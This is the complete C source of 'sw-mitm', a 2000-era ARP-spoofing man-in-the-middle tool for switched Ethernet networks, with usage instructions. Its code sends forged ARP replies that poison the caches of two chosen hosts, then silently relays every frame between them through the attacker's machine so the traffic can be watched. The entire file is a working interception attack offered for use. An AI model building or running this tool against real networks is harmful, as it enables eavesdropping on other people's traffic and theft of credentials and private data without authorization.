/*
 * sw-mitm.c - (c) 2000 noah [tm@ns2.crw.se] 
 *
 * Preview version 0.2.
 *
 *
 * Man in the Middle tool for level 2 switches.
 *
 * Requires libnet..
 *    http://www.packetfactory.net/Projects/Libnet/dist/libnet.tar.gz
 * ..and libpcap.
 *    ftp://ftp.lbl.ee.gov/libpcap.tar.Z (i use libpcap v0.4)
 * If you intend to use this software under OpenBSD or FreeBSD then load
 * the etherspoof lkm so BPF can write spoofed ethernet MAC's to the wire.
 *
 *
 * USAGE:
 * ./sw-mitm [-v] <iface> <your ip> <host A ip> <host B ip>
 *   Make you a MitM between host A and host B.
 *
 * Compiled & tested (found working too!) on Linux 2.2.
 * Should work on FreeBSD/OpenBSD with the etherspoof lkm.
 * Check out Libnet-1.0.1b/doc/README.bpf
 *
 * RFC:
 * ARP - http://www.landfield.com/rfcs/rfc826.html
 *
 *
 */

#include <stdio.h>
#include <libnet.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <ctype.h>
#include <pcap.h>


/* Line 42 */

#define ARP_UPDATE 20		/* Update ARP cache each ARP_UPDATE second. */
#define ARP_REQ_TIMEOUT 3	/* Arp lookup timeout. */


/* So we can have *real* fun in future versions (i.e. multiple sessions) */
typedef struct {
	u_char host_a_mac[6], host_b_mac[6];
	u_long host_a_ip, host_b_ip;
} MitM_SESSION;


char *dev = NULL;
u_char my_mac[6], bc_mac[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
u_long my_ip;
struct libnet_link_int *intf;
struct pcap_pkthdr pkthdr;
pcap_t *plink;
int verbose = 0;
MitM_SESSION *s1;


int find_mac(u_long, u_char *);
int send_arp(u_char *, u_char *, u_char *, u_long, u_long);
int arp_update(MitM_SESSION *);
void switch_bridge(MitM_SESSION *);
void end_of_fun(int);


int main(int argc, char **argv)
{
	char ebuf[0xff];
	struct in_addr target = { 0 };
	struct ether_addr *ea;
	int idx = 1;
	MitM_SESSION session;


	if(getuid() && geteuid()) {
		printf("conflictd: run as root ashole!\n");
		return -1;
	}

	if(argc != 5 && argc != 6) {
		printf("Usage: %s [-v] <iface> <your ip> <host A ip> " 
			"<host B ip>\n", argv[0]);
		printf("\tEx: %s ed0 10.0.0.100 10.0.0.25 10.0.0.42\n",
			argv[0]);

		return -1;
	}

	/* Cleanup stuff on Ctrl-C */
	signal(SIGINT, end_of_fun);
	signal(SIGTERM, end_of_fun);

	s1 = &session;

	if(!strcmp(argv[idx++], "-v"))
		verbose++;
	else
		idx--;

	dev = argv[idx++];
	inet_aton(argv[idx++], &target);
	if((my_ip = target.s_addr) == 0) {
		printf("Invalid own ip. Specify as a.b.c.d!\n");
		return -1;
	}

	inet_aton(argv[idx++], &target);
	if((s1->host_a_ip = target.s_addr) == 0) {
		printf("Invalid host A ip. Specify as a.b.c.d!\n");
		return -1;
	}

	inet_aton(argv[idx++], &target);
	if((s1->host_b_ip = target.s_addr) == 0) {
		printf("Invalid host B ip. Specify as a.b.c.d!\n");
		return -1;
	}

	target.s_addr = my_ip;
	printf("-- You: %s\t", inet_ntoa(target));
	target.s_addr = s1->host_a_ip;
	printf("Host A: %s\t", inet_ntoa(target));
	target.s_addr = s1->host_b_ip;
	printf("Host B: %s\n", inet_ntoa(target));


	/* Open interfaces and get a raw sock.. */
	printf("-- Using interface %s.\n", dev);
	if(!(intf = libnet_open_link_interface(dev, ebuf))) {
		printf("libnet_open_link_interface(): %s.\n", ebuf);
		return -1;
	}

	if(!(plink = pcap_open_live(dev, LIBNET_ETH_H+LIBNET_ARP_H, 
				    0, 1000, ebuf))) {
		/* This is potential problem :P */
		printf("pcap_open_live(): %s.\n", ebuf);
		return -1;
	}


	if(!(ea = libnet_get_hwaddr(intf, dev, ebuf))) {
		printf("libnet_get_hwaddr(): %s.\n", ebuf);
		return -1;
	};

	memcpy(my_mac, ea->ether_addr_octet, 6);
	printf("-- Your MAC: %.2X:%.2X:%.2X:%.2X:%.2X:%.2X.\n",
		my_mac[0], my_mac[1], my_mac[2],
		my_mac[3], my_mac[4], my_mac[5]);


	if(find_mac(s1->host_a_ip, s1->host_a_mac)) {
		printf("Sorry, couldn't lookup host A's MAC address.\n");
		return -1;
	}

	if(find_mac(s1->host_b_ip, s1->host_b_mac)) {
		printf("Sorry, couldn't lookup host B's MAC address.\n");
		return -1;
	}

	printf("-- Hit Ctrl-C to interrupt and cleanup.\n");

	arp_update(s1);

	switch_bridge(s1);

	return 0;
}


int find_mac(u_long ip, u_char *found_mac) {
	u_char *pkt = NULL;
	u_char *data;
	u_char no_mac[] = { 0, 0, 0, 0, 0, 0 };
	struct in_addr ia;
	time_t curr_time;


	if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H, &pkt) < 0) {
		printf("libnet_init_packet(): out of memory.\n");
		return -1;
	}

	libnet_build_ethernet(bc_mac, my_mac, ETHERTYPE_ARP, NULL, 0, pkt);
	libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP,
			 ETHER_ADDR_LEN, 4, ARPOP_REQUEST, 
			 /* Sender's MAC & IP */
			 my_mac, (u_char *)&my_ip,
			 /* Target's MAC & IP */
			 no_mac, (u_char *)&ip, 
			 NULL, 0, pkt + LIBNET_ETH_H);

	if(libnet_write_link_layer(intf, dev, pkt,
				   LIBNET_ETH_H+LIBNET_ARP_H) < 0) {
		printf("libnet_write_link_layer(): "
		       "Couldn't write packet.\n");

		return -1;
	}

	libnet_destroy_packet(&pkt);


	/* So, now we've send out an arp request for that ip.
	   Let's see if we get an answer! */

	curr_time = time(NULL);
	do {
		struct libnet_ethernet_hdr *e;
		struct libnet_arp_hdr *a;
		
		if(curr_time+ARP_REQ_TIMEOUT < time(NULL))
			return -1;

		data = (u_char *)pcap_next(plink, &pkthdr);
		if(!data)
			continue;

		e = (struct libnet_ethernet_hdr *)data;
		if(ntohs(e->ether_type) != ETHERTYPE_ARP)
			continue;

		a = (struct libnet_arp_hdr *)((u_char *)data + LIBNET_ETH_H);
		if(ntohs(a->ar_op) != ARPOP_REPLY)
			continue;

		if(!memcmp(a->ar_tha, bc_mac, 6))
			continue; /* broadcast arp */

		if(memcmp(a->ar_spa, &ip, 4))
			continue;

		memcpy(found_mac, a->ar_sha, 6);
		break;

	} while(1);

	ia.s_addr = ip;
	printf("-- %s is at %.2X:%.2X:%.2X:%.2X:%.2X:%.2X.\n",
		inet_ntoa(ia),
		found_mac[0], found_mac[1], found_mac[2],
		found_mac[3], found_mac[4], found_mac[5]);
	return 0;
}


int send_arp(u_char *esrc, u_char *dst, u_char *src, u_long dip, u_long sip) {
	u_char *pkt;
	struct in_addr ia;

	if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H, &pkt) < 0) {
		printf("libnet_init_packet(): out of memory.\n");
		return -1;
	}

	libnet_build_ethernet(dst, esrc, ETHERTYPE_ARP, NULL, 0, pkt);
	libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP,
			 ETHER_ADDR_LEN, 4, ARPOP_REPLY, 
			 /* Sender's MAC & IP */
			 src, (u_char *)&sip,
			 /* Target's MAC & IP */
			 dst, (u_char *)&dip, 
			 NULL, 0, pkt + LIBNET_ETH_H);

	if(libnet_write_link_layer(intf, dev, pkt, 
		LIBNET_ETH_H+LIBNET_ARP_H) < 0) {
		printf("libnet_write_link_layer(): Couldn't write packet.\n");
		return -1;
	}

	libnet_destroy_packet(&pkt);

	ia.s_addr = sip;
	if(verbose)
		printf("send_arp(): Told %.2X:%.2X:%.2X:%.2X:%.2X:%.2X "
			"that %s is at %.2X:%.2X:%.2X:%.2X:%.2X:%.2X.\n", 
			dst[0], dst[1], dst[2],
			dst[3], dst[4], dst[5],
			inet_ntoa(ia),
			src[0], src[1], src[2],
			src[3], src[4], src[5]);

	return 0;
}


int arp_update(MitM_SESSION *s) {
	time_t t;

	/* Make host A think we're host B */
	send_arp(my_mac, s->host_a_mac, my_mac, s->host_a_ip, s->host_b_ip);

	/* Make host B think we're host A */
	send_arp(my_mac, s->host_b_mac, my_mac, s->host_b_ip, s->host_a_ip);

	if(verbose) {
		t = time(NULL);
		printf("-- arp update on %s", ctime(&t));
	}


	return 0;
}


/* Bridge packets between host A and B */
void switch_bridge(MitM_SESSION *s) {
	u_char *data, *b_data, *dst_mac, *dst, *src;
	struct libnet_ethernet_hdr *e;
	int quick_hack = 0;
	time_t start_time, some_time, last_update;


	if(verbose)
		printf("-- switch_bridge().\n");


	start_time = last_update = time(NULL);
	do {
		some_time = time(NULL);
		if(((some_time - start_time) % ARP_UPDATE) == 0 &&
		   last_update != some_time) {

			last_update = some_time;
			arp_update(s);
		}


		data = (u_char *)pcap_next(plink, &pkthdr);
		if(!data)
			continue;

		e = (struct libnet_ethernet_hdr *)data;
		if(ntohs(e->ether_type) == ETHERTYPE_ARP) {
			/* The two first pkts are our's. */
			if(quick_hack++ < 2)
				continue;
		}
	
		if(!memcmp(s->host_a_mac, e->ether_shost, 6))
			dst_mac = s->host_b_mac;
		else if(!memcmp(s->host_b_mac, e->ether_shost, 6))
			dst_mac = s->host_a_mac;
		else
			continue;


		dst = e->ether_dhost;
		src = e->ether_shost;

		if(!memcmp(dst, bc_mac, 6)) /* Broadcast, skip it.. */
			continue;
	

		if(verbose)	
			printf("bridge: From %.2X:%.2X:%.2X:%.2X:%.2X:%.2X to"
				" %.2X:%.2X:%.2X:%.2X:%.2X:%.2X (0x%.4x).\n", 
				src[0], src[1], src[2],
				src[3], src[4], src[5],
				dst[0], dst[1], dst[2],
				dst[3], dst[4], dst[5], 
				ntohs(e->ether_type));



		if(libnet_init_packet(0xffff, &b_data) < 0) {
			printf("libnet_init_packet(): out of memory.\n");
			return;
		}


		libnet_build_ethernet(dst_mac, my_mac, e->ether_type,
				      data+14, pkthdr.caplen-14, b_data);
		if(libnet_write_link_layer(intf, dev, b_data,
		   pkthdr.caplen) < 0)
		{
			printf("libnet_write_link_layer(): "
				"Couldn't write packet.\n");
			return;
		}

		e = (struct libnet_ethernet_hdr *)b_data;
		dst = e->ether_dhost;
		src = e->ether_shost;
		if(verbose)
			printf("bridge pxy: From %.2X:%.2X:%.2X:%.2X:%.2X:%.2X to"
				" %.2X:%.2X:%.2X:%.2X:%.2X:%.2X.\n", 
				src[0], src[1], src[2],
				src[3], src[4], src[5],
				dst[0], dst[1], dst[2],
				dst[3], dst[4], dst[5]);


		libnet_destroy_packet(&b_data);
	} while(1);
}



void end_of_fun(int signo) {
	if(signo == SIGTERM)
		printf("-- Terminated :/.\n");

	printf("-- Cleaning up.\n");

	send_arp(my_mac, s1->host_a_mac, s1->host_b_mac, s1->host_a_ip, s1->host_b_ip);
	send_arp(my_mac, s1->host_b_mac, s1->host_a_mac, s1->host_b_ip, s1->host_a_ip);

	pcap_close(plink);

	libnet_close_link_interface(intf);

	exit(0);
}
